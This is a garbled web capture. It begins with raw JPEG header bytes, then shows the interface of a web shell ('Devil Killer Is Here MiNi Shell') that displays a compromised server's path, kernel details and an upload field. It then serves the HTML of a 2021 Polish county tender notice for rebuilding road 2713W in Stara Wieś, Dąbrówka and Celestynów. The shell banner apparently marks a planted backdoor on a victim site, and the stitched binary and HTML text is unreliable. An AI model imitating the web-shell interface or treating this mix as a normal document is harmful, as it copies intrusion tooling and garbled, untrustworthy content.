JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211129/0029029301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa i przebudowa drogi powiatowej Nr 2713W w miejscowości Stara Wieś, Dąbrówka i Celestynów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W OTWOCKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 014848593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bohaterów Westerplatte 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@powiat-otwocki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.powiat-otwocki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa i przebudowa drogi powiatowej Nr 2713W w miejscowości Stara Wieś, Dąbrówka i Celestynów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8e30c166-50e7-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00290293</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.soldea.pl/epz/epz/postepowanieedycja.php?idPostepowania=1340 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.soldea.pl/epz/epz/postepowanieedycja.php?idPostepowania=1340</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający złożyć ofertę zobowiązany jest założyć konto na platformie do komunikacji<br/>elektronicznej EPZ pod adresem<br/>https://www.soldea.pl/epz/epz/<br/>Oznacza konieczność akceptacji regulaminu platformy i zapoznania się z instrukcjami korzystania z<br/>konta na platformie.<br/>b) Oferty składa się tylko za pośrednictwem platformy EPZ.<br/>c) W korespondencji związanej z niniejszym postępowaniem Wykonawcy powinni posługiwać się<br/>numerem postępowania.<br/>d) Wejście na platformę EPZ odbywa się poprzez link aktywny po kliknięciu poniższego obiektu<br/>Znajdującego się w zakładce Zamówienia publiczne/ Zarząd Dróg Powiatowych/ Zamówienia o<br/>wartości powyżej 130 000 zł netto<br/>e) Aktualne wymagania techniczne związane z korzystaniem z Platformy EPZ – wskazane są na<br/>stronie internetowej logowania i rejestracji Platformy - pod adresem: https://www.soldea.pl/epz/epz/<br/>f) Sposób przesyłania plików (oferty, oświadczeń, dokumentów, prac konkursowych) za pośrednictwem<br/>Platformy EPZ oraz potwierdzenia złożenia plików zostały opisane w Instrukcjach (filmach)<br/>użytkowników Platformy EPZ.<br/>g) Wykonawca uzyskuje dostęp do Platformy EPZ poprzez rejestrację konta lub zalogowanie jeżeli<br/>posiada wcześniej zarejestrowane konto i postępuje zgodnie z instrukcjami operatora. Wykonawca po<br/>zalogowaniu ma dostęp do bazy postępowania Zamawiającego i wybiera z listy przedmiotowe<br/>postępowanie. Wykonawca ma obowiązek śledzić komunikaty generowane przez Platformę EPZ.<br/>Wykonawca rejestruje się bezpłatnie na Platformie EPZ pod podany adres, zgodnie z zasadami<br/>podanym przez operatora platformy EPZ.<br/>h) Wykonawca zamierzający korzystać z platformy EPZ zobowiązany jest zapoznać się z aktualnymi<br/>instrukcjami używania platformy EPZ.<br/>i) Sposób korzystania z Platformy EPZ został przedstawiony w zakładce „FAQ” oraz w zamieszczonych<br/>na Platformie EPZ filmikach instruktażowych dostępnych po zalogowaniu się do platformy.<br/>j) Za pomocą tego Platformy EPZ wykonawca składa ofertę, oświadczenia o niewykluczeniu, o<br/>spełnieniu warunków udziału w postępowaniu, pełnomocnictwa, zobowiązania podmiotu trzeciego i<br/>inne dokumenty związane z postępowaniem oraz zadaje pytania do SWZ.<br/>k) Powiadomienia oraz wezwania od zamawiającego będą przekazywane za pomocą Platformy EPZ w<br/>zakładce „Do Wykonawcy”.<br/>l) Odpowiedzi na żądania Zamawiającego składa się przez Wykonawcę w oknie platformy<br/>przeznaczonym do składania plików do Zamawiającego w podziale na pliki jawne i te zastrzeżoną<br/>tajemnicą przedsiębiorstwa.<br/>m) Zadawanie pytań przez Wykonawców odbywa się tylko w zakładce „Pytania do SWZ”. Odpowiedzi<br/>na pytania zamawiający zamieszcza pod adresem www.bpi.powiat-otwocki.pl<br/>Szczegółowe informację dotyczące informacji o środkach komunikacji elektronicznej, przy użyciu<br/>których Zamawiaczy będzie komunikował się z Wykonawcą opisane zostały w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych w Otwocku z/s w<br/>Karczewie ul. Bohaterów Westerplatte 36, 05-480 Karczew tel. 22 780 64 21<br/>• inspektorem ochrony danych osobowych w Zarząd Dróg Powiatowych w Otwocku jest Pani Daria<br/>Bartnicka, email: iod@powiat-otwocki.pl ,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843), dalej „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>• posiada Pani/Pan:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z<br/>uprawnienia do sprostowania lub<br/>uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana<br/>wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawi Skorzystanie<br/>Skorzystanie przez osobę, której dane osobowe dotyczą, z<br/>uprawnienia do sprostowania lub<br/>uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana<br/>wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawi Skorzystanie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/P-36/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Informację dotyczące części I – rozbudowa oraz przebudowa drogi powiatowej Nr 2713W <br/>1)	Przedmiot zamówienia został opisany na dwóch odrębnych dokumentacjach projektowych<br/>a)	Projekt rozbudowy drogi powiatowej Nr 2713W – ulicy Mazowieckiej w Dąbrówce i Otwockiej w Celestynowie – w związku z budową chodnika opracowanym przez firmę BPI Biuro Prac Inżynierskich Sp. z o.o.<br/>b)	Projekt przebudowy drogi powiatowej nr 2713W w miejscowości Stara Wieś, Dąbrówka i Celestynów opracowanej przez firmę VIAINFRA Sp. z o.o., <br/>2)	Zakres prac w odniesieniu do projektu rozbudowy drogi powiatowej Nr 2713W – ulicy Mazowieckiej w Dąbrówce i Otwockiej w Celestynowie – w związku z budową chodnika – projekt wykonany przez BPI Biuro Prac Inżynierskich Sp. z o. o. <br/>a)	Prace należy wykonać na odcinku od skrzyżowania ul. Mazowieckiej z ul. Prostą (przy czym prace należ wykonać również na ulicy Prostej), do końca działki cmentarza – należy wykonać cały zakres przedstawiony w dokumentacji projektowej z wyłączeniem wykonania kanału technologicznego uwzględnionego w dokumentacji;<br/>b)	Przewiduje się wykonanie następujących robót:<br/>	Usunięcie kolidujących drzew<br/>	Usunięcie ziemi roślinnej z terenu budowy ze zmagazynowaniem jej w celu późniejszego wykorzystania,<br/>	Rozebranie nawierzchni utwardzonych wraz z krawężnikami i obrzeżami, kolidującymi z nowym rozwiązaniem projektowym,<br/>	Przesunięcie kolidujących ogrodzeń,<br/>	Przebudowa rowów i przepustów pod zjazdami, z omijaniem gazociągu z umocnieniem dna i skarp rowów o dużym pochyleniach lub stromych skarpach,<br/>	Wybudowanie nowego przepustu dwuotworowego na rowie melioracyjnym w miejscu projektowanego chodnika z umocnieniami dna i skarp pobliskich rowów,<br/>	Wykonanie potrzebnych nasypów z dowozem gruntu sypkiego i koryt pod nawierzchnie drogowe z wywozem gruntu,<br/>	Ustawienie krawężników i obrzeży,<br/>	Ułożenie warstw konstrukcyjnych nawierzchni drogowych,<br/>	Regulacja wysokościowa elementów armatury podziemnych sieci uzbrojenia terenu,<br/> Rekultywacja zieleńców przez ich oczyszczenie, pokrycie ziemią roślinną i obsianie trawą lub ułożenie płatów darni,<br/>	Wprowadzenie zaktualizowanej organizacji ruchu KT.7121.2.101.2020.MB, przy czym oznakowanie poziome należy wykonać w technologii grubowarstwowej (w przypadku nie wprowadzenia stałej organizacji ruchu w okresie jej ważności Wykonawca jest zobowiązany do przedłużenia jej ważności i nie może żądać z tego tytułu dodatkowych roszczeń)<br/>c)	Szczegółowy zakres robót został określony w dokumentacji projektowej<br/>d)	UWAGA: w ramach zamówienia nie wykonuje się kanału technologicznego wskazanego w dokumentacji<br/>e)	Wykonanie robót budowlanych zgodnie z dokumentacją projektową <br/><br/>3)	Zakres prac w odniesieniu do projektu przebudowy drogi powiatowej Nr 2713W w miejscowości Stara Wieś, Dąbrówka i Celestynów – projekt wykonany przez VIAINFRA Sp. z o. o.<br/>a)	Prace należy wykonać na odcinku od km 1+987,48 do 3+353 – na podstawie kilometraża przedstawionego w dokumentacji firmy VIAINFRA Sp. z o. o.<br/>b)	Przewiduje się wykonanie następujących robót:<br/>	Wykonanie nowej nawierzchni jezdni na całym odcinku,<br/>	Wymiana nawierzchni chodników, wysp, zjazdów,<br/>	Wykonanie odwodnienia drogi,<br/>	Wykonanie prac związanych z zielenią w tym wycinka drzew,<br/>	Wykonanie kanału technologicznego<br/>	wprowadzenie zaktualizowanej organizacji ruchu KT.7121.2.108.2020.MB, przy czym oznakowanie poziome należy wykonać w technologii grubowarstwowej (w przypadku nie wprowadzenia stałej organizacji ruchu w okresie jej ważności Wykonawca jest zobowiązany do przedłużenia jej ważności i nie może żądać z tego tytułu dodatkowych roszczeń) <br/>	wykonanie doświetlenia przejść dla pieszych zgodnie z dokumentacją projektową:<br/>- przejście dla pieszych zlokalizowane na ulicy Mazowieckiej przy skrzyżowaniu ulicy Mazowieckiej z ulicą Karczewską,<br/>- przejście dla pieszych zlokalizowane na ulicy Mazowieckiej przy skrzyżowaniu ulicy Mazowieckiej z ulicą Skośną,<br/>- przejście dla pieszych zlokalizowane na ulicy Mazowieckiej przy skrzyżowaniu ulicy Mazowieckiej z ulicą Poprzeczną <br/><br/>c)	Szczegółowy zakres robót został określony w dokumentacji projektowej<br/>d)	UWAGA: w ramach zamówienia na przedmiotowym odcinku należy wykonać kanał technologiczny <br/>e)	UWAGA: Zamawiający wymaga aby warstwę ścieralną nawierzchni jezdni wykonać całą szerokością jezdni,<br/>f)	UWAGA: roboty należy prowadzić w koordynacji z wykonawcą kanalizacji sanitarnej, której inwestorem jest gmina Celestynów – odcinkowo prowadzić prace po zakończeniu prac związanych z budową kanalizacji<br/>g)	W ramach zamówienia należy wykonać doświetlenie przejść dla pieszych na przejściach wskazanych w projekcie opracowanym przez firmę VIAINFRA Sp. z o. o.:<br/>h)	Należy wykonać cały zakres prac wyszczególnionych w projekcie na wskazanym odcinku powiększony o konieczność wykonania wszystkich doświetleń przejść dla pieszych wskazanych w projekcie opracowanym przez VIAINFRA Sp. z o. o.<br/>4)	Wykonawca zobowiązany jest do uzyskania w imieniu Zamawiającego pozwolenia na użytkowanie obiektu budowlanego;<br/>5)	Wykonawca zobowiązany jest do umieszczenia tablicy informacyjnej przed realizacją inwestycji oraz po jej realizacji według wzoru określonego przez Zamawiającego,<br/>6)	Prace należy prowadzić z zachowaniem odpowiednich przepisów i instrukcji bezpieczeństwa pracy przy wykonywaniu robót budowlanych, Zamawiający informuje, że jest w posiadaniu Czasowej organizacji ruchu, w związku z czym Wykonawca może wykorzystać przedmiotową organizację lub opracować nową. Wykonawca zobowiązany jest do wprowadzenia Czasowej Organizacji Ruchu na czas budowy. Po zakończonych robotach Wykonawca wprowadzi stałą organizację ruchu<br/>7)	Wykonawca zobowiązany jest do zagospodarowania we własnym zakresie materiałów pochodzących z rozbiórki<br/>8) Po zakończonych robotach Wykonawca wykona dokumentację powykonawcza, w skład której wchodzić będą między innymi wyniki badań, atesty, deklaracje zgodności, dokumentacja fotograficzna, zawiadomienie o wprowadzeniu czasowej organizacji i zawiadomienie o wprowadzeniu stałej organizacji ruchu oraz inne dokumenty wskazane przez Inspektora, dokument potwierdzający fakt złożenia inwentaryzacji powykonawczej. Wykonawca po otrzymaniu geodezyjnej inwentaryzacji powykonawczej jest zobowiązany do dostarczenia oryginału do Zamawiającego ,<br/><br/>Dopuszczenie rozwiązań równoważnych opisywanym w przypadku opisania przedmiotu zamówienia przez odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 Pzp<br/>Opisując przedmiot zamówienia przez odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 Pzp, zamawiający dopuszcza rozwiązania równoważne opisywanym.<br/>Zamawiający nie może odrzucić oferty tylko dlatego, że oferowane roboty budowlane nie są zgodne z normami, ocenami technicznymi, specyfikacjami technicznymi i systemami referencji technicznych, do których opis przedmiotu zamówienia się odnosi, pod warunkiem że wykonawca udowodni w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104-107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Informację dotyczące części II – przebudowa ulicy Fabrycznej w Starej Wsi <br/>1)	Przedmiot zamówienia został opisany na projekcie przebudowy drogi powiatowej nr 2713W w miejscowości Stara Wieś, Dąbrówka i Celestynów opracowanej przez firmę VIAINFRA Sp. z o.o., <br/>2)	Prace należy wykonać na odcinku od ul. Kolejowej do ul. Dąbrowieckiej – km 0+000 do km 0+288 – na podstawie kilometraża przedstawionego w dokumentacji firmy VIAINFRA Sp. z o. o.<br/>3)	Przewiduje się wykonanie następujących robót:<br/>	Wykonanie nowej nawierzchni jezdni na całym odcinku,<br/>	Wymiana nawierzchni chodników, wysp, zjazdów,<br/>	Wykonanie odwodnienia drogi,<br/>	Wykonanie prac związanych z zielenią, w tym wycinka drzew,<br/>	Wykonanie kanału technologicznego<br/>	wprowadzenie zaktualizowanej organizacji ruchu KT.7121.2.108.2020.MB, przy czym oznakowanie poziome należy wykonać w technologii grubowarstwowej (w przypadku nie wprowadzenia stałej organizacji ruchu w okresie jej ważności Wykonawca jest zobowiązany do przedłużenia jej ważności i nie może żądać z tego tytułu dodatkowych roszczeń) <br/>	w ramach zamówienia należy wymienić wszystkie znaki pionowe wraz z słupkami na nowe w granicy opracowania oprócz tablicy E-1 – oznakowanie wskazane jako istniejące – rodzaj i wielkość znaków zgodnie z projektem SOR i SST <br/>4)	Szczegółowy zakres robót został określony w dokumentacji projektowej. Należy wykonać cały zakres prac wyszczególnionych w projekcie na wskazanym 